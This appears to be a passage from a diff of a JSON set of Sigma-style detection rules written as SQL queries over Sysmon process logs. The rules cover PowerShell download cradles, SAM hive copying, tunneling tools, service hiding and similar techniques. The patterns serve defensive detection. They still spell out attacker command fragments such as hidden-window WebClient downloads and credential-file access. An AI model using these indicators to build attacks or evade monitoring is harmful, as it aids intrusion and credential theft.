OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE 
'%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "status": "experimental", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1090" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), 
oscd.community", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND 
CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine 
LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "status": "test", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR 
CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Administrative 
scripts." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "title": "Data Copied To Clipboard Via Clip.EXE", + "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "status": "test", + "description": "Detects the execution of clip.exe in order to copy data to the clipboard. 
Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_clip_execution.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "status": "test", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1036", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' 